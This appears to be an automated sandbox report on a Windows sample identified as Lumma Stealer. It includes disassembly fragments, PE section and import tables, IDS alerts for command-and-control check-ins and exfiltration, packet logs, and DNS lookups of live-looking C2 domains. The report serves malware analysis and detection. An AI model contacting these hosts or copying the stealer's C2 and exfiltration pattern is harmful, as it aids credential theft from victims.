                                                                                                                                                                                                                                            call 00007F42A0855E0Ah
                                                                                                                                                                                                                                            jmp 00007F42A0855C6Dh
                                                                                                                                                                                                                                            mov ecx, dword ptr [0043B680h]
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            mov edi, BB40E64Eh
                                                                                                                                                                                                                                            mov esi, FFFF0000h
                                                                                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                                                                                            je 00007F42A0855E06h
                                                                                                                                                                                                                                            test esi, ecx
                                                                                                                                                                                                                                            jne 00007F42A0855E28h
                                                                                                                                                                                                                                            call 00007F42A0855E31h
                                                                                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                                                                                            cmp ecx, edi
                                                                                                                                                                                                                                            jne 00007F42A0855E09h
                                                                                                                                                                                                                                            mov ecx, BB40E64Fh
                                                                                                                                                                                                                                            jmp 00007F42A0855E10h
                                                                                                                                                                                                                                            test esi, ecx
                                                                                                                                                                                                                                            jne 00007F42A0855E0Ch
                                                                                                                                                                                                                                            or eax, 00004711h
                                                                                                                                                                                                                                            shl eax, 10h
                                                                                                                                                                                                                                            or ecx, eax
                                                                                                                                                                                                                                            mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                            not ecx
                                                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                                                            mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                            sub esp, 14h
                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                            xorps xmm0, xmm0
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                            call dword ptr [00436D00h]
                                                                                                                                                                                                                                            mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            call dword ptr [00436CB8h]
                                                                                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            call dword ptr [00436CB4h]
                                                                                                                                                                                                                                            xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call dword ptr [00436D50h]
                                                                                                                                                                                                                                            mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                            lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                            xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                            xor eax, ecx
                                                                                                                                                                                                                                            leave
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            mov eax, 00004000h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push 0043CF48h
                                                                                                                                                                                                                                            call dword ptr [00436D28h]
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            push 00030000h
                                                                                                                                                                                                                                            push 00010000h
                                                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                                                            call 00007F42A085CBE3h
                                                                                                                                                                                                                                            add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36a7c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8d000 | 0x3fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x88400 | 0x2628 | .bss
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3f000 | 0x2744 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x32608 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ea98 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x36c3c | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2b4ca | 0x2b600 | ebf84c6b836020b1a66433a898baeab7 | False | 0.5443702719740634 | data | 6.596404756541432 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2d000 | 0xc50c | 0xc600 | 96e76e7ef084461591b1dcd4c2131f05 | False | 0.40260022095959597 | data | 4.741850626178578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x3714 | 0x2800 | d87fd4546a2b39263a028b496b33108f | False | 0.29814453125 | data | 5.024681407682101 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x3e000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3f000 | 0x2744 | 0x2800 | c7508b57e36483307c47b7dd73fc0c85 | False | 0.75166015625 | data | 6.531416896423856 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x42000 | 0x4ac00 | 0x4ac00 | 2da6d61cb00d0efd06baee91a3464b4c | False | 1.0003298756270902 | data | 7.999402791741808 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x8d000 | 0x3fc | 0x400 | 6a4851071664eb0d5787860b0928a2fa | False | 0.4443359375 | data | 3.391431520369637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8d058 | 0x3a4 | data | English | United States | 0.44849785407725323
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | ShowWindow
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T02:54:56.855361+0100 | 2058582 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) | 1 | 192.168.2.5 | 49776 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:56.997814+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.5 | 57431 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.140993+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.5 | 57700 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.283504+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.5 | 55478 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.422764+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.5 | 56762 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.564017+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.5 | 61762 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.703572+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.5 | 49614 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.846935+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.5 | 50352 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:57.993945+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.5 | 55504 | 1.1.1.1 | 53 | UDP
2024-12-28T02:54:59.800180+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T02:55:00.570475+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T02:55:02.189349+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:02.927391+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:02.927391+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:04.234024+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:05.008074+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:05.008074+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:06.674165+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:07.625903+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49711 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:08.988622+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:11.790231+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:14.249228+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:16.798762+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:20.536647+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49727 | 104.21.66.86 | 443 | TCP
2024-12-28T02:55:21.336316+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49727 | 104.21.66.86 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.194267035 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.194344997 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927450895 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927695990 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927902937 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928533077 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928587914 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928627014 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928644896 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968405008 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968444109 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968529940 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.969043970 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.969055891 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.233956099 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.234024048 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235774040 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235789061 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235995054 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237854958 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237941980 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237966061 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008078098 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008138895 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008199930 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008224964 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008444071 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008501053 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008511066 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009366989 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009392977 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009416103 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009422064 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009468079 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.016002893 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026737928 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026807070 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026813984 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.079859972 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.079869986 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.126785994 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.127686977 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.173602104 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.209039927 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214061975 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214138031 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214135885 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214167118 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214257002 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214257002 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214314938 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214423895 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214457035 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214469910 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214476109 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.412969112 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413026094 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413099051 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413433075 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413449049 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.674063921 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.674165010 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690258026 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690306902 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690629005 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.699609995 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.703847885 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.703902960 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.625935078 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626064062 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626135111 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626231909 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626275063 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721573114 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721658945 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721754074 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.722013950 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.722045898 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.988437891 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.988621950 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990022898 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990056992 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990418911 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991667986 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991799116 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991861105 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991925001 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:09.039350986 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.324836016 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325010061 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325088978 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325185061 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.855360985 CET4977653192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.993011951 CET53497761.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.997813940 CET5743153192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.135519028 CET53574311.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.140993118 CET5770053192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.279089928 CET53577001.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.283504009 CET5547853192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.420448065 CET53554781.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.422764063 CET5676253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.560283899 CET53567621.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.564017057 CET6176253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.701679945 CET53617621.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.703572035 CET4961453192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.841408968 CET53496141.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.846935034 CET5035253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.984738111 CET53503521.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.993944883 CET5550453192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.131542921 CET53555041.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.210289001 CET6200053192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.347234964 CET53620001.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.821491957 CET6271553192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.959465027 CET53627151.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 02:54:56.855360985 CET | 192.168.2.5 | 1.1.1.1 | 0x6d7 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:56.997813940 CET | 192.168.2.5 | 1.1.1.1 | 0x19f2 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.140993118 CET | 192.168.2.5 | 1.1.1.1 | 0xa01a | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.283504009 CET | 192.168.2.5 | 1.1.1.1 | 0x9548 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.422764063 CET | 192.168.2.5 | 1.1.1.1 | 0xb055 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.564017057 CET | 192.168.2.5 | 1.1.1.1 | 0x4c41 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.703572035 CET | 192.168.2.5 | 1.1.1.1 | 0x796a | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.846935034 CET | 192.168.2.5 | 1.1.1.1 | 0xd5f | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.993944883 CET | 192.168.2.5 | 1.1.1.1 | 0x9116 | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:58.210289001 CET | 192.168.2.5 | 1.1.1.1 | 0x39b2 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:55:00.821491957 CET | 192.168.2.5 | 1.1.1.1 | 0xb878 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 02:54:56.993011951 CET | 1.1.1.1 | 192.168.2.5 | 0x6d7 | Name error (3) | mindhandru.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.135519028 CET | 1.1.1.1 | 192.168.2.5 | 0x19f2 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.279089928 CET | 1.1.1.1 | 192.168.2.5 | 0xa01a | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.420448065 CET | 1.1.1.1 | 192.168.2.5 | 0x9548 | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.560283899 CET | 1.1.1.1 | 192.168.2.5 | 0xb055 | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.701679945 CET | 1.1.1.1 | 192.168.2.5 | 0x4c41 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:57.841408968 CET | 1.1.1.1 | 192.168.2.5 | 0x796a | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false
